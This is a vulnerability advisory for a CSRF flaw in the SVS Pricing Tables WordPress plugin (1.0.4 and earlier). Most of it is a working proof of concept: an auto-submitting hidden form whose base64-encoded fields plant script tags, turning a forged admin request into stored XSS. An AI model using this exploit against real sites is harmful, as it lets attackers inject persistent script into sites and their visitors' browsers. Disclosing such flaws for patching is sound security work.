Description
The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the savePricingTable() function. This makes it possible for unauthenticated attackers to create and edit pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Severity
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Affected Version
<= 1.0.4
PoC :
<html>
<!-- eneriiiii PoC <3 -->
<body>
<form action="http://[ASSETS]/wp-admin/admin.php?page=svs_pricing_tables&Action=pricingTableSave" method="POST">
<input type="hidden" name="name" value="eneriiii - XSS" />
<input type="hidden" name="template" value="t04" />
<input type="hidden" name="htmlAdmin" value="PHNlY3Rpb24gaWQ9InN2c19wcmljZV9wbGFucyIgY2xhc3M9InN2c19wdF9jbGVhcmZpeCI+CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1zZXR0aW5ncyBvaSIgZGF0YS1nbHlwaD0iY29nIj48L3NwYW4+CiAgICAgIDxzcGFuIGNsYXNzPSJzdnNfaWNvbiBpY29uLWZlYXR1cmVkIG9pIiBkYXRhLWdseXBoPSJzdGFyIj48L3NwYW4+CiAgICAgIDxzcGFuIGNsYXNzPSJzdnNfaWNvbiBpY29uLXRyYXNoLXBsYW4gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L3NwYW4+CiAgIDxsaSBjbGFzcz0ic3ZzX3RpdGxlIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kiIGRhdGEtZ2x5cGg9Im1vdmUiPjwvaT48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1vcHRpb24gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L2k+PGgyIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPjxzY3JpcHQ+YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBOQU1FJyk8L3NjcmlwdD48L2gyPjwvZGl2PjwvbGk+PGxpIGNsYXNzPSJzdnNfYnV0dG9uIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kiIGRhdGEtZ2x5cGg9Im1vdmUiPjwvaT48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1vcHRpb24gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L2k+PGkgY2xhc3M9InN2c19pY29uIGljb24tbGluayBvaSIgZGF0YS1nbHlwaD0ibGluay1pbnRhY3QiPjwvaT48YSBocmVmPSIjIiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgQnV0dG9uJyk8L3NjcmlwdD48L2E+PC9kaXY+PC9saT48L29sPgogICA8b2wgY2xhc3M9InN2c19wcmljZV9wbGFuIiBzdHlsZT0iIj4KICAgICAgPHNwYW4gY2xhc3M9InN2c19pY29uIGljb24tc2V0dGluZ3Mgb2kiIGRhdGEtZ2x5cGg9ImNvZyI+PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1mZWF0dXJlZCBvaSIgZGF0YS1nbHlwaD0ic3RhciI+PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1wbGFuIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI+PC9zcGFuPgogICA8bGkgY2xhc3M9InN2c19wcmljZSI+PGRpdj48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi1tb3ZlIG9pIiBkYXRhLWdseXBoPSJtb3ZlIj48L2k+PGkgY2xhc3M9InN2c19pY29uIGljb24tdHJhc2gtb3B0aW9uIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI+PC9pPjxwPjxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPjxzY3JpcHQ+YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBQcmljZScpPC9zY3JpcHQ+PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPi8gbW9udGg8L3NwYW4+PC9wPjwvZGl2PjwvbGk+PC9vbD48b2wgY2xhc3M9InN2c19wcmljZV9wbGFuIiBzdHlsZT0iIj4KICAgICAgPHNwYW4gY2xhc3M9InN2c19pY29uIGljb24tc2V0dGluZ3Mgb2kiIGRhdGEtZ2x5cGg9ImNvZyI+PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1mZWF0dXJlZCBvaSIgZGF0YS1nbHlwaD0ic3RhciI+PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1wbGFuIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI+PC9zcGFuPgogICA8bGkgY2xhc3M9InN2c19vcHRpb25fdmFsdWUiPjxkaXY+PGkgY2xhc3M9InN2c19pY29uIGljb24tbW92ZSBvaSIgZGF0YS1nbHlwaD0ibW92ZSI+PC9pPjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLXRyYXNoLW9wdGlvbiBvaSIgZGF0YS1nbHlwaD0idHJhc2giPjwvaT48cD48c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj5WYWx1ZTwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgdmFsdWUnKTwvc2NyaXB0Pjwvc3Bhbj48L3A+PC9kaXY+PC9saT48bGkgY2xhc3M9InN2c19vcHRpb25feWVzX25vIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kgIiBkYXRhLWdseXBoPSJtb3ZlIj48L2k+PGkgY2xhc3M9InN2c19pY29uIGljb24tdHJhc2gtb3B0aW9uIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI+PC9pPjxwPjxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfeWVzX25vIiB0aXRsZT0iQ2xpY2sgdG8gZWRpdC4uLiI+PGltZyBzcmM9Imh0dHA6Ly8xMDMuMTg5LjIzNC41Ny93cC1jb250ZW50L3BsdWdpbnMvc3ZzLXByaWNpbmctdGFibGVzL3RlbXBsYXRlcy90MDQvaW1hZ2VzL3llcy5wbmciPjwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgeWVzL25vIG9wdGlvbicpPC9zY3JpcHQ+PC9zcGFuPjwvcD48L2Rpdj48L2xpPjwvb2w+PG9sIGNsYXNzPSJzdnNfbmV3X3BsYW4iPgogICAgICA8c3BhbiBjbGFzcz0iaWNvbi1hZGQgb2kiIGRhdGEtZ2x5cGg9InBsdXMiPjwvc3Bhbj4KICAgPC9vbD4KPC9zZWN0aW9uPg==" />
<input type="hidden" name="html" value="PHNlY3Rpb24gaWQ9InN2c19wcmljZV9wbGFucyIgY2xhc3M9InN2c19wdF9jbGVhcmZpeCI+CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c190aXRsZSI+PGRpdj48aDIgY2xhc3M9InN2c19wdF9lZGl0YWJsZV90ZXh0Ij48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgTkFNRScpPC9zY3JpcHQ+PC9oMj48L2Rpdj48L2xpPjxsaSBjbGFzcz0ic3ZzX2J1dHRvbiI+PGRpdj48YSBocmVmPSIjIiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ+YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBCdXR0b24nKTwvc2NyaXB0PjwvYT48L2Rpdj48L2xpPjwvb2w+CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c19wcmljZSI+PGRpdj48cD48c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ+YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBQcmljZScpPC9zY3JpcHQ+PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCI+LyBtb250aDwvc3Bhbj48L3A+PC9kaXY+PC9saT48L29sPjxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c19vcHRpb25fdmFsdWUiPjxkaXY+PHA+PHNwYW4gY2xhc3M9InN2c19wdF9lZGl0YWJsZV90ZXh0Ij5WYWx1ZTwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ+YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyB2YWx1ZScpPC9zY3JpcHQ+PC9zcGFuPjwvcD48L2Rpdj48L2xpPjxsaSBjbGFzcz0ic3ZzX29wdGlvbl95ZXNfbm8iPjxkaXY+PHA+PHNwYW4gY2xhc3M9InN2c19wdF9lZGl0YWJsZV95ZXNfbm8iIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48aW1nIHNyYz0iaHR0cDovLzEwMy4xODkuMjM0LjU3L3dwLWNvbnRlbnQvcGx1Z2lucy9zdnMtcHJpY2luZy10YWJsZXMvdGVtcGxhdGVzL3QwNC9pbWFnZXMveWVzLnBuZyI+PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCI+PHNjcmlwdD5hbGVydCgnZW5lcmlpaWlpIDwzIC0gWFNTIHllcy9ubyBvcHRpb24nKTwvc2NyaXB0Pjwvc3Bhbj48L3A+PC9kaXY+PC9saT48L29sPgo8L3NlY3Rpb24+" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Reference
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/svs-pricing-tables/svs-pricing-tables-104-cross-site-request-forgery-to-pricing-table-editcreation
- https://plugins.trac.wordpress.org/browser/svs-pricing-tables/trunk/app/model/svs_pt_model_main.php#L61